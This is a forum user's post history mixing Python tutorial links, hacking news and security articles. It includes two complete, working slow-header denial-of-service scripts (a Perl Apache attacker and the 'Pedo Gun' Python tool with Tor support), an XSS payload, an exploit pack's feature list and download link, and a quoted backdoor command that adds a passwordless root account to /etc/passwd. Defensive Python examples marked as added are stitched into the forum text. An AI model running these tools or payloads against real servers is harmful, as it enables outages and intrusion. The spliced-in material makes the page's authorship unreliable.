Everything posted by Nytro

  1. Python Programming Tutorials

    Here is all of my Python Programming high quality tutorials! All videos are by thenewboston; duration and view count in parentheses.

     1. Installing Python (3:19, 293,520 views)
     2. Numbers and Math (5:40, 192,181 views)
     3. Variables (6:25, 152,139 views)
     4. Modules and Functions (7:08, 154,537 views)
     5. How to Save Your P... (8:25, 122,680 views)
     6. Strings (6:23, 104,006 views)
     7. More on Strings (5:28, 86,868 views)
     8. Raw Input (2:56, 89,108 views)
     9. Sequences and Lists (5:04, 82,545 views)
    10. Slicing (7:43, 82,488 views)
    11. Editing Sequences (6:43, 72,190 views)
    12. More List Functions (6:28, 68,699 views)
    13. Slicing Lists (4:58, 55,699 views)
    14. Intro to Methods (6:02, 60,803 views)
    15. More Methods (4:15, 54,476 views)
    16. Sort and Tuples (3:57, 49,275 views)
    17. Strings n Stuff (6:18, 47,952 views)
    18. Cool String Methods (5:31, 50,276 views)
    19. Dictionary (6:13, 54,215 views)
    20. If Statement (5:50, 57,107 views)
    21. else and elif (5:05, 45,434 views)
    22. Nesting Statements (4:17, 41,405 views)
    23. Comparison Operators (4:33, 38,245 views)
    24. And and Or (6:15, 36,982 views)
    25. For and While Loops (5:37, 51,979 views)
    26. Infinite Loops an... (5:45, 42,562 views)
    27. Building Functions (5:20, 47,205 views)
    28. Default Parameters (4:04, 35,939 views)
    29. Multiple Parameters (5:08, 34,582 views)
    30. Parameter Types (6:10, 34,451 views)
    31. Tuples as Parameters (4:22, 29,344 views)
    32. Object Oriented P... (7:10, 63,602 views)
    33. Classes and Self (7:48, 54,274 views)
    34. Subclasses Superc... (4:12, 36,963 views)
    35. Overwrite Variabl... (3:16, 29,873 views)
    36. Multiple Parent C... (3:46, 28,343 views)
    37. Constructors (4:17, 30,597 views)
    38. Import Modules (6:51, 36,160 views)
    39. reload Modules (4:21, 25,267 views)
    40. Getting Module Info (5:21, 28,038 views)
    41. Working with Files (6:28, 38,421 views)
    42. Reading and Writing (5:23, 35,579 views)
    43. Writing Lines (6:11, 50,767 views)

    Youtube: http://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
  2. All About Python and Unicode

    March 4, 2007 - 3:39pm - frank

    Contents:
    - A Starting Point
    - Unicode Text in Python
    - Converting Unicode symbols to Python literals
    - Why doesn't "print" work?
    - Codecs
    - From Unicode to binary
    - From binary to Unicode
    - String Operations
    - A wrinkle in {{{\U}}}
    - Bugs in Python 2.0 & 2.1
    - Python as a "universal recoder"
    - Now the Fun Begins ...
    - Unicode and the Real World
    - Unicode Filenames
    - Microsoft Windows
    - Unix/POSIX/Linux
    - Mac OS/X
    - Unicode and HTML
    - Unicode and XML
    - Unicode and network shares (Samba)
    - Summary

    Article: http://boodebr.org/main/python/all-about-python-and-unicode
  3. iPad 2 iOS 5 Lock Screen Bypass Vulnerability + Video

    Mark Gurman at 9to5Mac has discovered a vulnerability on the iPad that allows a limited bypass of the device's lock screen. Anyone with an iPad Smart Cover can gain access to the previously open app (or the home screen if no app was open). By holding the power button to bring up the 'Power Off' screen, closing the Smart Cover, re-opening it, and tapping Cancel, the attacker is dropped into the screen that was open before the iPad was locked. If the attacker lands on the home screen, they can see the installed apps but cannot open anything. If Safari or Mail (or any other app) was open when the device was locked, the attacker has access to that app.

    From a locked iPad 2:
    1) Lock a password-protected iPad 2
    2) Hold down the power button until the iPad 2 shows the power-off slider
    3) Close the Smart Cover
    4) Open the Smart Cover
    5) Tap Cancel at the bottom of the screen

    Video: http://www.youtube.com/watch?v=NLgQ22naQhE

    This isn't the first security issue Apple has experienced since rolling out iOS 5. On the brand new iPhone 4S it has been discovered that you can use Siri while the device is locked. Even if a passcode is required, Siri doesn't care and lets you carry out functions such as sending email and text messages.

    Protection against the iPad 2 lock screen bypass: for the time being, iPad 2 users are encouraged to disable the "Smart Cover unlocking" feature found in Settings > General.

    Source: http://thehackernews.com/2011/10/ipad-2-ios-5-lock-screen-bypass.html
  4. Anonymous Hackers Take Down 40 Child Porn Websites

    Anonymous has taken down more than 40 darknet-based child porn websites over the last week. Details of some of the hacks have been released via Pastebin under #OpDarknet, including the personal details of 1500 users of a site named 'Lolita City', and DDoS tools that target Hidden Wiki and Freedom Hosting, alleged to be two of the biggest darknet sites hosting child porn. News of the Anonymous campaign to actively target anyone hosting child porn sites comes from statements associated with Anonymous on Pastebin and two Anonymous YouTube video channels. AnonNews has yet to issue a press release. The AnonMessage and BecomeAnonymous YouTube channels both posted videos with statements of intent to hunt, skin and kill pedobears everywhere, starting with Freedom Hosting.

    Source: http://thehackernews.com/2011/10/anonymous-hackers-take-down-40-child.html
  5. OpenVAS - Advanced Open Source vulnerability scanner

    OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The OpenVAS solution is available as Free Software and maintained on a daily basis.

    An overview of the vulnerability handling process is:
    - The reporter reports the vulnerability privately to OpenVAS.
    - The appropriate component's developers work privately with the reporter to resolve the vulnerability.
    - A new release of the OpenVAS component concerned is made that includes the fix.

    The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol (OMP). All intelligence is implemented in the Manager, so that it is possible to implement various lean clients that behave consistently, e.g. with regard to filtering or sorting scan results. The Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is centrally stored.

    Download: http://www.openvas.org/download.html

    Source: OpenVAS - Advanced Open Source vulnerability scanner ~ THN : The Hacker News
  6. XSS Vulnerability in Interactive YouTube API Demo Beta

    There is a critical cross-site scripting (XSS) vulnerability in the Interactive YouTube API Demo Beta, discovered by various sources. White hat hacker "Vansh Sharma" informed us about this XSS vulnerability with a proof of concept.

    Proof of concept:
    - Open YouTube Data API - Demo Beta
    - Enter the script <img src="<img src=search"/onerror=alert("xss")//"> in the keyword area.
    - Press ADD

    Source: XSS Vulnerability in Interactive YouTube API Demo Beta ~ THN : The Hacker News
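    The demo fails because the keyword is copied into the page's HTML unchanged. The following is an added example, not code from the THN post or from YouTube's demo: a toy keyword-echo renderer in Python in its vulnerable and hardened forms, with the proof-of-concept string from the post as the constructed input and an HTML parser used to list which tags each output actually contains. The renderer and the "Results for:" wrapper are this example's own assumptions.

```python
# Added example (not the THN post's or YouTube's code): the keyword-echo pattern
# behind the demo page, first as a vulnerable renderer and then hardened with
# html.escape(), checked by parsing the output and listing the tags it contains.
import html
from html.parser import HTMLParser

# The proof-of-concept string quoted in the post above, used here as test input.
PAYLOAD = '<img src="<img src=search"/onerror=alert("xss")//">'


def render_vulnerable(keyword):
    """Interpolates the user-supplied keyword straight into HTML: the flaw."""
    return '<p>Results for: %s</p>' % keyword


def render_hardened(keyword):
    """Escapes &, <, >, \" and ' first, so the keyword is shown as text only."""
    return '<p>Results for: %s</p>' % html.escape(keyword, quote=True)


class _TagCollector(HTMLParser):
    """Records the start tags a browser-like parser would see in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(fragment):
    """Start tags present in the rendered output, in document order."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def roundtrips(keyword):
    """Escaping loses nothing: the original keyword is recoverable from the text."""
    return html.unescape(html.escape(keyword, quote=True)) == keyword


if __name__ == "__main__":
    print(start_tags(render_vulnerable(PAYLOAD)))   # contains 'img': injected element
    print(start_tags(render_hardened(PAYLOAD)))     # ['p']: the keyword stayed text
```

    Escaping at the point where untrusted text is written into HTML is the fix the demo needed; the parser check is a cheap way to confirm in a unit test that no user-controlled element or event handler survives into the output.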
  7. Bleeding Life 2 Exploit Pack Released

    Black Hat Academy releases the Bleeding Life 2 exploit pack. This is an exploit pack that affects Windows-based web browsers via Adobe and Java. You can read all about it, and download it for yourself. Statistics are kept based on exploit, browser, and OS version.

    Exploits
    [+] Adobe
    - CVE-2008-2992
    - CVE-2010-1297
    - CVE-2010-2884
    - CVE-2010-0188
    [+] Java
    - CVE-2010-0842
    - CVE-2010-3552
    - Signed Applet

    Features
    - Advanced Statistical Information
    - Stylish Progress Bars
    - Full User-Friendly Admin Panel
    - Referer Stats
    - Secure Panel - Login/Logout
    - Ability To Set and Save Passwords On Panel
    - Ability To Allow Guest Access - Guest Can Only View Stats Page, Clicking and Other Pages Disabled.
    - Ability To Add and/or Remove Exploits Used
    - Ability To Add Scan4You Credentials For Built-In Scanner Use
    - Ability To Filter Browsers
    - Ability To Filter Operating Systems
    - Attempt To Detect and Filter HTTP Proxies
    - Ability To Blacklist by IP/Range
    - Ability To Import Blacklist On Panel
    - Built In Scanner
    - Ability To Upload Payload From Panel
    - Payload Statistical Information - MD5, Size, SHA1
    - Ability To Generate iFrame On Panel / Encrypted
    - Ability To Domain Check/Scan On Panel

    Download: http://www.blackhatacademy.org/releases/bleeding-life-2-download.tgz

    Source: http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html
  8. Apache Server Denial of Service exploit (DDOS)

#!/usr/bin/perl -w
# Exploit Title: Apache Server Denial of Service exploit (DDOS)
# Date: 22/10/2011
# Author: Xen0n
# Software Link: http://www.apache.org/dyn/closer.cgi
# Version: 2.3.14 and older
# Tested on: CentOs
#feel free to contact us xenon.sec@gmail.com

use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors

print <<EOTEXT;
Welcome to Xen0n Apache Attacker
EOTEXT

my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
    'shost=s'   => \$shost,
    'dns=s'     => \$host,
    'xenon'     => \$xenon,
    'num=i'     => \$connections,
    'cache'     => \$cache,
    'port=i'    => \$port,
    'https'     => \$ssl,
    'tcpto=i'   => \$tcpto,
    'test'      => \$test,
    'timeout=i' => \$timeout,
    'version'   => \$version,
);

if ($version) {
    print "Version 1.0\n";
    exit;
}

unless ($host) {
    print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
    print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";
    print "\n\temail: xenon.sec@ gmail.com\n";
    print "\n";
    exit;
}

unless ($port) {
    $port = 80;
    print "Defaulting to port 80.\n";
}

unless ($tcpto) {
    $tcpto = 5;
    print "Defaulting to a 5 second tcp connection timeout.\n";
}

unless ($test) {
    unless ($timeout) {
        $timeout = 100;
        print "Defaulting to a 100 second re-try timeout.\n";
    }
    unless ($connections) {
        $connections = 1000;
        print "Defaulting to 1000 connections.\n";
    }
}

my $usemultithreading = 0;
if ( $Config{usethreads} ) {
    print "Multithreading enabled.\n";
    $usemultithreading = 1;
    use threads;
    use threads::shared;
}
else {
    print "No multithreading capabilites found!\n";
    print "Xen0n will be slower than normal as a result.\n";
}

my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;

srand() if ($cache);

if ($shost) {
    $sendhost = $shost;
}
else {
    $sendhost = $host;
}

if ($xenon) {
    $method = "POST";
}
else {
    $method = "GET";
}

if ($test) {
    my @times = ( "1", "30", "90", "240", "500" );
    my $totaltime = 0;
    foreach (@times) {
        $totaltime = $totaltime + $_;
    }
    $totaltime = $totaltime / 60;
    print "Testing $host could take up to $totaltime minutes.\n";

    my $delay   = 0;
    my $working = 0;
    my $sock;

    if ($ssl) {
        if (
            $sock = new IO::Socket::SSL(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    else {
        if (
            $sock = new IO::Socket::INET(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }

    if ($working) {
        if ($cache) {
            $rand = "?" . int( rand(99999999999999) );
        }
        else {
            $rand = "";
        }
        my $primarypayload =
            "GET /$rand HTTP/1.1\r\n"
          . "Host: $sendhost\r\n"
          . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
          . "Content-Length: 42\r\n";
        if ( print $sock $primarypayload ) {
            print "Connection successful, now just wait...\n";
        }
        else {
            print "That's odd - I connected but couldn't send the data to $host:$port.\n";
            print "Is something wrong?\nDying.\n";
            exit;
        }
    }
    else {
        print "Uhm... I can't connect to $host:$port.\n";
        print "Is something wrong?\nDying.\n";
        exit;
    }

    for ( my $i = 0 ; $i <= $#times ; $i++ ) {
        print "Trying a $times[$i] second delay: \n";
        sleep( $times[$i] );
        if ( print $sock "X-a: b\r\n" ) {
            print "\tWorked.\n";
            $delay = $times[$i];
        }
        else {
            if ( $SIG{__WARN__} ) {
                $delay = $times[ $i - 1 ];
                last;
            }
            print "\tFailed after $times[$i] seconds.\n";
        }
    }

    if ( print $sock "Connection: Close\r\n\r\n" ) {
        print "Okay that's enough time. Xen0n closed the socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    else {
        print "Remote server closed socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }

    if ( $delay < 166 ) {
        print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Xen0n against this target. You can tweak
the -tcpto flag down to 1 second but it still may not build the sockets in
time.
EOSUCKS2BU
    }
}
else {
    print "Attacking $host:$port every $timeout seconds with $connections sockets:\n";
    if ($usemultithreading) {
        domultithreading($connections);
    }
    else {
        doconnections( $connections, $usemultithreading );
    }
}

sub doconnections {
    my ( $num, $usemultithreading ) = @_;
    my ( @first, @sock, @working );
    my $failedconnections = 0;
    $working[$_] = 0 foreach ( 1 .. $num );    #initializing
    $first[$_]   = 0 foreach ( 1 .. $num );    #initializing

    while (1) {
        $failedconnections = 0;
        print "\t\tBuilding sockets.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 0 ) {
                if ($ssl) {
                    if (
                        $sock[$z] = new IO::Socket::SSL(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                else {
                    if (
                        $sock[$z] = new IO::Socket::INET(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                        $packetcount = $packetcount + 3;    #SYN, SYN+ACK, ACK
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                if ( $working[$z] == 1 ) {
                    if ($cache) {
                        $rand = "?" . int( rand(99999999999999) );
                    }
                    else {
                        $rand = "";
                    }
                    my $primarypayload =
                        "$method /$rand HTTP/1.1\r\n"
                      . "Host: $sendhost\r\n"
                      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                      . "Content-Length: 42\r\n";
                    my $handle = $sock[$z];
                    if ($handle) {
                        print $handle "$primarypayload";
                        if ( $SIG{__WARN__} ) {
                            $working[$z] = 0;
                            close $handle;
                            $failed++;
                            $failedconnections++;
                        }
                        else {
                            $packetcount++;
                            $working[$z] = 1;
                        }
                    }
                    else {
                        $working[$z] = 0;
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;
                    $failed++;
                    $failedconnections++;
                }
            }
        }

        print "\t\tSending data.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 1 ) {
                if ( $sock[$z] ) {
                    my $handle = $sock[$z];
                    if ( print $handle "X-a: b\r\n" ) {
                        $working[$z] = 1;
                        $packetcount++;
                    }
                    else {
                        $working[$z] = 0;    #debugging info
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;    #debugging info
                    $failed++;
                    $failedconnections++;
                }
            }
        }

        print "Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";
        sleep($timeout);
    }
}

sub domultithreading {
    my ($num) = @_;
    my @thrs;
    my $i                    = 0;
    my $connectionsperthread = 50;
    while ( $i < $num ) {
        $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 );
        $i += $connectionsperthread;
    }
    my @threadslist = threads->list();
    while ( $#threadslist > 0 ) {
        $failed = 0;
    }
}

__END__

    Source: Apache HTTP server Denial of service venerability
  9. Pedo Gun - PEW PEW - Anonymous DDOSer

#!/usr/bin/python
# this assumes you have the socks.py (http://phiral.net/socks.py)
# and terminal.py (http://phiral.net/terminal.py). DDoS used to take out Hidden Wiki and
# Freedom Hosting sites. Based of Tor Hammer by entropy. Uses SLLLLLLOOOOW HEADERS
# Chris H. [redacted to avoid copyright issues] attack

import os
import re
import time
import sys
import random
import math
import getopt
import socks
import string
import terminal
from threading import Thread

global stop_now
global term

stop_now = False
term = terminal.TerminalController()

useragents = [
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
    "Opera/9.20 (Windows NT 6.0; U; en)",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
    "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
    "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13",
    "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
    "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7"
]


class httpPost(Thread):
    def __init__(self, host, port, tor):
        Thread.__init__(self)
        self.host = host
        self.port = port
        self.socks = socks.socksocket()
        self.tor = tor
        self.running = True

    def _send_http_post(self, pause=10):
        global stop_now
        self.socks.send("GET / HTTP/1.1\r\n"
                        "Host: %s\r\n"
                        "User-Agent: %s\r\n"
                        "Connection: keep-alive\r\n"
                        "Keep-Alive: 900\r\n"
                        "Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-"
                        "Accept-Encoding: gzip, deflate, compress" % (self.host, random.choice(useragents)))
        for i in range(0, 9999):
            if stop_now:
                self.running = False
                break
            p = "X-"+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+": "+random.choice(string.letters+string.digits)
            print term.BOL+term.UP+term.CLEAR_EOL+"HEADER: %s" % p+term.NORMAL
            self.socks.send(p+"\r\n")
            time.sleep(random.uniform(30, 40))
        self.socks.close()

    def run(self):
        while self.running:
            while self.running:
                try:
                    if self.tor:
                        self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
                    self.socks.connect((self.host, self.port))
                    print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL
                    break
                except Exception, e:
                    if e.args[0] == 106 or e.args[0] == 60:
                        break
                    print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL
                    time.sleep(1)
                    continue
            while self.running:
                try:
                    self._send_http_post()
                except Exception, e:
                    if e.args[0] == 32 or e.args[0] == 104:
                        print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL
                        self.socks = socks.socksocket()
                        break
                    time.sleep(0.1)
                    pass


def usage():
    print "./ch.py -t <target> [-r <threads> -p <port> -T -h]"
    print " -t|--target <Hostname|IP>"
    print " -r|--threads <Number of threads> Defaults to 256"
    print " -p|--port <Web Server Port> Defaults to 80"
    print " -h|--help Shows this help\n"
    print "Eg. ./ch.py -t 192.168.1.100 -r 256\n"


def main(argv):
    try:
        opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="])
    except getopt.GetoptError:
        usage()
        sys.exit(-1)

    global stop_now

    target = ''
    threads = 256
    tor = False
    port = 80

    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
            sys.exit(0)
        if o in ("-t", "--target"):
            target = a
        elif o in ("-r", "--threads"):
            threads = int(a)
        elif o in ("-p", "--port"):
            port = int(a)

    if target == '' or int(threads) <= 0:
        usage()
        sys.exit(-1)

    print term.DOWN + term.RED + "/*" + term.NORMAL
    print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL
    print term.RED + " * Threads: %d" % (threads) + term.NORMAL
    print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL

    rthreads = []
    for i in range(threads):
        t = httpPost(target, port, tor)
        rthreads.append(t)
        t.start()

    while len(rthreads) > 0:
        try:
            rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()]
        except KeyboardInterrupt:
            print "\nShutting down threads...\n"
            for t in rthreads:
                stop_now = True
                t.running = False


if __name__ == "__main__":
    print "\n/*"
    print "********"
    print "*"+term.RED + " To Catch a Predator "+term.NORMAL+"*"
    print "********"
    print " */\n"
    main(sys.argv[1:])

    Pastebin: #OpDarkNet - Offical Release: Pedo Gun - PEW PEW - Pastebin.com
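    Both scripts above (items 8 and 9) rely on the same server weakness: a connection is held open indefinitely while the client drips one bogus header line per sleep interval and never sends the blank line that ends the header block. The following is an added example, not part of either post, that models the server-side countermeasure: a header-completion window that grows only with bytes actually received and is capped at a maximum (the idea behind Apache's mod_reqtimeout "header=20-40,MinRate=500"), plus a cap on half-open requests per client address. The window values, the per-address limit, the addresses and the replayed timelines are this example's own assumptions; the replayed drip interval mirrors the Perl script's default 100-second timeout.

```python
# Added example (not from either DDoS script above): a model of the
# header-completion deadline and per-address half-open limit that defeat
# slow-header clients. All values and timelines are constructed for illustration.

HEADER_INITIAL = 20.0      # seconds granted for the header block (assumed, as mod_reqtimeout header=20-40)
HEADER_MAX = 40.0          # hard cap: the window never extends past opened_at + HEADER_MAX
MIN_RATE = 500             # bytes/s: each received byte buys 1/MIN_RATE seconds more
PER_IP_PENDING_LIMIT = 20  # incomplete requests tolerated from one client address (assumed)


class Connection:
    """One client connection waiting for a complete HTTP request header block."""

    def __init__(self, client_ip, opened_at):
        self.ip = client_ip
        self.opened_at = opened_at
        self.deadline = opened_at + HEADER_INITIAL
        self.buf = b""
        self.state = "pending"     # pending | accepted | dropped
        self.reason = None

    def drop(self, reason):
        self.state, self.reason = "dropped", reason
        return self.state

    def feed(self, now, data=b""):
        """Deliver bytes that arrived at time `now`; empty data is a timer sweep."""
        if self.state != "pending":
            return self.state
        if now > self.deadline:
            return self.drop("header block not completed in time")
        self.buf += data
        # A dripped 'X-a: b' line is 8 bytes: it extends the window by 16 ms,
        # and the cap means dripping can never keep the connection alive past HEADER_MAX.
        self.deadline = min(self.deadline + len(data) / MIN_RATE,
                            self.opened_at + HEADER_MAX)
        if b"\r\n\r\n" in self.buf:
            self.state = "accepted"
        return self.state


class Server:
    def __init__(self):
        self.conns = []

    def open(self, client_ip, now):
        pending = sum(1 for c in self.conns if c.ip == client_ip and c.state == "pending")
        conn = Connection(client_ip, now)
        if pending >= PER_IP_PENDING_LIMIT:
            conn.drop("too many incomplete requests from %s" % client_ip)
        self.conns.append(conn)
        return conn

    def sweep(self, now):
        """Periodic timer: expire pending connections whose window has closed."""
        for c in self.conns:
            c.feed(now)
        return sum(1 for c in self.conns if c.state == "dropped")


# --- Constructed replays -------------------------------------------------------

# The opening fragment both tools send: request line and a few headers, no blank line.
SLOW_OPENING = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
                b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0)\r\nContent-Length: 42\r\n")


def replay_slow_header_client(drip_interval=100.0, drips=5):
    """Partial header at t=0, then one 'X-a: b' line every drip_interval seconds."""
    srv = Server()
    conn = srv.open("198.51.100.7", 0.0)
    conn.feed(0.0, SLOW_OPENING)
    for k in range(1, drips + 1):
        srv.sweep(k * drip_interval - 1.0)        # timer fires before the next drip
        conn.feed(k * drip_interval, b"X-a: b\r\n")
    return conn.state                             # "dropped" at the first sweep


def replay_normal_client():
    """Whole header block arrives within 200 ms and is accepted."""
    srv = Server()
    conn = srv.open("203.0.113.9", 0.0)
    conn.feed(0.1, b"GET / HTTP/1.1\r\nHost: example.test\r\n")
    conn.feed(0.2, b"Accept: */*\r\n\r\n")
    return conn.state                             # "accepted"


def replay_flood(n):
    """n simultaneous half-open requests from one address: returns (pending, dropped)."""
    srv = Server()
    for _ in range(n):
        srv.open("192.0.2.44", 0.0).feed(0.0, SLOW_OPENING)
    pending = sum(1 for c in srv.conns if c.state == "pending")
    dropped = sum(1 for c in srv.conns if c.state == "dropped")
    return pending, dropped
```

    The two controls are complementary: the deadline bounds how long any single dripping connection can occupy a worker, and the per-address cap bounds how many such connections one source can hold at once, which is what turns a 1000-socket run from either tool into 20 briefly pending sockets and a stream of immediate rejections.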
  10. Wireless charging has become reality

    by Radu Eftimie | 21 October 2011

    Many would probably agree that nothing is worse, on a day when your schedule is full, than running out of battery on your mobile phone. This problem seems to have already found its solution thanks to Powermat technology, which charges mobile devices on the go, writes Mashable. Wireless battery-charging technology has existed since 2009, and since then the company has been trying to improve the system. Powermat works on the principle of energy transfer by magnetic induction. Energy is transferred from a transmitter built into the base of the revolutionary device to a receiver that attaches (via a dedicated connector) to the phone or other gadget that needs charging. The energy transfer through the magnetic field is interrupted automatically once the device's battery is fully charged, to avoid wasting energy. In the future, the company, which now works with Duracell, General Motors and other big names from several fields, says the wireless charging system will become available in airports, hotels, cafes and company offices, but also in every home. Powermat also claims the technology will become dominant within 10 years.

    Source and video: Incarcarea wireless a devenit realitate | Hit.ro
  11. Nytro

    Forum problem

    It's the forum's fault; I don't know what can be done, I hope the encoding of the database tables won't have to be changed. kwe said he'd take care of it when he has time; I'll keep nagging him.
  12. "Professional" hosting: F:\xampp\htdocs...
  13. Bypassing Windows 7 Kernel ASLR

    Authored by Stefan Le Berre

    Whitepaper called Bypassing Windows 7 Kernel ASLR. In this paper, the author explains every step to code an exploit with a useful kernel ASLR bypass. Successful exploitation is performed on Windows 7 SP0 / SP1.

    Download: http://dl.packetstormsecurity.net/papers/bypass/NES-BypassWin7KernelAslr.pdf
  14. I think it's fake, at least that's what some people who analysed it say. It creates a root account with no password.
  15. That "evil" hex ends with:

    "/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"

    It sends the data wherever you tell it: send(s, buffer, strlen(buffer), 0)

    This is executed locally... execl("/bin/sh", "sh", "-c", evil, 0);

    So I think it's fake, a backdoor, so don't run it (at least NOT as root). Or remove:

    if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL);

    Although this may be needed for the shell. I don't know what the first instructions do; if I have time and manage to disassemble the data from the hex, maybe I can work out whether it infects or not. For now I'm not sure whether it's a backdoor or not; run it as a normal user and there shouldn't be any problems.
  16. 10 Steps to Securing Your WordPress Installation

    Fouad Matin on Sep 16th 2011 with 39 comments

    Tutorial Details
    Program: WordPress
    Version: 3.2.1
    Difficulty: Beginner
    Estimated Completion Time: 20 - 30 minutes

    WordPress is open source, which means that everyone, including hackers with malicious intent, can scour the source code looking for holes in its security. That is why I'm going to show you some good precautionary steps to take to protect you, your WordPress and, most importantly, your users.

    #1 Remove the Admin Superuser

    Probably the easiest thing you could do to protect yourself is to start off by changing/removing the admin superuser. Anyone who uses WordPress knows that there is a user called admin with top-level security clearance, especially hackers. If the username is admin, how hard can it be to crack the password? Create a new administrative account, but this time with a different name, and then delete the admin account. In fact, what I would personally recommend is to create an administrative account with a very complex username and password (something like x7duEls91*), store it somewhere, and make another account under your own name for publishing content, one that does not have executive powers. The admin account is essentially only needed to manage themes, plugins and other aspects of the site that do not need to be changed on a daily basis; an editor account would be sufficient.

    "Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months." ~Clifford Stoll

    #2 Choose a Strong Password

